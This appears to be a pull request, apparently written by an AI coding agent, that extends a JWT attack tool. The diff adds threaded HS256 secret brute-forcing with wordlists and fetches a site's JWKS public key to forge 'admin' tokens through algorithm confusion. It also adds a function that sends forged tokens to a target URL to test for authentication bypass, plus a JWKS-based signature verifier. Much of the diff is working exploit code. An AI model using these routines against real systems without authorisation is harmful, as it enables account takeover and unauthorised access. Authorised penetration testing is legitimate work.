### PR TITLE
Add JWKS and extended JWT tooling

### DIFF
--- a/jwtek/core/brute_forcer.py
+++ b/jwtek/core/brute_forcer.py
@@ -4,12 +4,14 @@ import os
 import jwt
 from jwt.exceptions import InvalidSignatureError, DecodeError
 from tqdm import tqdm
+from concurrent.futures import ThreadPoolExecutor
 
 # Preset wordlist mapping (if used)
+BASE_DIR = os.environ.get("JWTEK_WORDLIST_DIR")
 PRESET_WORDLISTS = {
-    "rockyou": "/usr/share/wordlists/rockyou.txt",
-    "jwt-secrets": "data/wordlists/jwt-secrets.txt",
-    "top10": "data/wordlists/top10.txt"
+    "rockyou": os.path.join(BASE_DIR, "rockyou.txt") if BASE_DIR else "/usr/share/wordlists/rockyou.txt",
+    "jwt-secrets": os.path.join(BASE_DIR or "data/wordlists", "jwt-secrets.txt"),
+    "top10": os.path.join(BASE_DIR or "data/wordlists", "top10.txt"),
 }
 
 def resolve_wordlist_path(wordlist_input):
@@ -26,7 +28,7 @@ def resolve_wordlist_path(wordlist_input):
         return None
 
 
-def brute_force_hs256(token, wordlist_input):
+def brute_force_hs256(token, wordlist_input, threads=1):
     wordlist_path = resolve_wordlist_path(wordlist_input)
     if not wordlist_path:
         return
@@ -41,22 +43,27 @@ def brute_force_hs256(token, wordlist_input):
 
     try:
         with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as f:
-            def word_gen():
-                for line in f:
-                    word = line.strip()
-                    if word:
-                        yield word
+            words = [w.strip() for w in f if w.strip()]
 
-            for word in tqdm(word_gen(), desc="Trying secrets"):
-                try:
-                    jwt.decode(token, word, algorithms=["HS256"])
-                    print(f"\n[+] Secret key FOUND: '{word}'")
-                    return word
-                except (InvalidSignatureError, DecodeError):
-                    continue
-                except Exception as e:
-                    print(f"[!] Error occurred during decode: {e}")
-                    break
+        def attempt(word):
+            try:
+                jwt.decode(token, word, algorithms=["HS256"])
+                return word
+            except (InvalidSignatureError, DecodeError):
+                return None
+
+        if threads > 1:
+            with ThreadPoolExecutor(max_workers=threads) as ex:
+                for word, result in zip(words, ex.map(attempt, words)):
+                    if result:
+                        print(f"\n[+] Secret key FOUND: '{result}'")
+                        return result
+        else:
+            for word in tqdm(words, desc="Trying secrets"):
+                res = attempt(word)
+                if res:
+                    print(f"\n[+] Secret key FOUND: '{res}'")
+                    return res
     except Exception as e:
         print(f"[!] Failed to read wordlist: {e}")
         return

--- a/jwtek/core/exploits.py
+++ b/jwtek/core/exploits.py
@@ -4,6 +4,18 @@ import json
 import requests
 from termcolor import cprint
 
+
+def fetch_first_jwks_key(jwks_url):
+    try:
+        resp = requests.get(jwks_url, timeout=5)
+        jwks = resp.json()
+        key = jwks.get("keys", [])[0]
+        if not key:
+            return None
+        return jwt.algorithms.RSAAlgorithm.from_jwk(json.dumps(key))
+    except Exception:
+        return None
+
 # === EXPLAIN FUNCTIONS ===
 
 def explain_alg_none():
@@ -94,7 +106,7 @@ def list_available_exploits():
 
 # === POC GENERATOR ===
 
-def generate_poc_token(vuln_id, secret=None):
+def generate_poc_token(vuln_id, secret=None, jwks_url=None):
     payload = {"user": "admin", "admin": True}
     if vuln_id == "alg-none":
         header = base64.urlsafe_b64encode(json.dumps({"alg": "none", "typ": "JWT"}).encode()).decode().rstrip("=")
@@ -104,6 +116,13 @@ def generate_poc_token(vuln_id, secret=None):
         token = jwt.encode(payload, secret, algorithm="HS256")
     elif vuln_id == "alg-swap-rs256" and secret:
         token = jwt.encode(payload, secret, algorithm="HS256")  # using public key as secret
+    elif vuln_id == "alg-swap-rs256" and jwks_url:
+        key = fetch_first_jwks_key(jwks_url)
+        if key:
+            token = jwt.encode(payload, key, algorithm="HS256")
+        else:
+            cprint("[!] Failed to fetch JWKS key", "red")
+            return
     else:
         cprint("[!] Cannot generate PoC: missing secret or invalid vuln ID.", "red")
         return
@@ -116,8 +135,16 @@ def generate_poc_token(vuln_id, secret=None):
 
 # === AUTH BYPASS ===
 
-def attempt_bypass(vuln_id, token, url):
+def attempt_bypass(vuln_id, token, url, jwks_url=None):
     cprint(f"\n[🔍] Testing token bypass at: {url}", "cyan")
+    if jwks_url and vuln_id == "alg-swap-rs256":
+        key = fetch_first_jwks_key(jwks_url)
+        if key:
+            try:
+                token = jwt.encode({"user": "admin"}, key, algorithm="HS256")
+                cprint("[+] Crafted token using JWKS key", "green")
+            except Exception:
+                cprint("[!] Failed to craft token from JWKS", "red")
     headers = {"Authorization": f"Bearer {token}"}
     try:
         response = requests.get(url, headers=headers, timeout=5)

--- a/jwtek/core/validator.py
+++ b/jwtek/core/validator.py
@@ -1,4 +1,5 @@
 import jwt
+import requests
 
 def verify_signature_rs256(token, public_key_path):
     print(f"\n[~] Attempting to verify RS256 signature using: {public_key_path}")
@@ -16,3 +17,40 @@ def verify_signature_rs256(token, public_key_path):
         print("[!] Signature is invalid! Token may have been tampered with.")
     except Exception as e:
         print(f"[!] Error verifying signature: {e}")
+
+
+def verify_signature_jwks(token, jwks_url):
+    print(f"\n[~] Attempting to verify signature using JWKS: {jwks_url}")
+    try:
+        try:
+            from jwt import PyJWKClient
+        except Exception:
+            print("[!] PyJWKClient unavailable. JWKS verification not supported.")
+            return
+
+        jwk_client = PyJWKClient(jwks_url)
+        signing_key = jwk_client.get_signing_key_from_jwt(token)
+        decoded = jwt.decode(
+            token,
+            signing_key.key,
+            algorithms=[
+                "RS256",
+                "RS384",
+                "RS512",
+                "ES256",
+                "ES384",
+                "ES512",
+                "PS256",
+                "PS384",
+                "PS512",
+            ],
+            options={"verify_aud": False},
+        )
+        print("[+] Signature verified successfully via JWKS!")
+        print("    Payload:", decoded)
+    except jwt.ExpiredSignatureError:
+        print("[!] Signature is valid but token is expired.")
+    except jwt.InvalidSignatureError:
+        print("[!] Signature is invalid! Token may have been tampered with.")
+    except Exception as e:
+        print(f"[!] Error verifying signature using JWKS: {e}")


### PR DESCRIPTION
## Summary
- support JWKS verification
- extend static analysis checks
- JSON output for batch analysis
- expand forge options including ES256/PS256 and kid header
- improve brute forcer with configurable paths and threading
- enhance claim auditing with severity and custom rules
- allow JWKS-based PoC creation and bypass attempts
- update CLI with new flags

## Testing
- `pytest -q`

------
https://chatgpt.com/codex/tasks/task_b_6871c5f6b4bc8327855d04642e180a76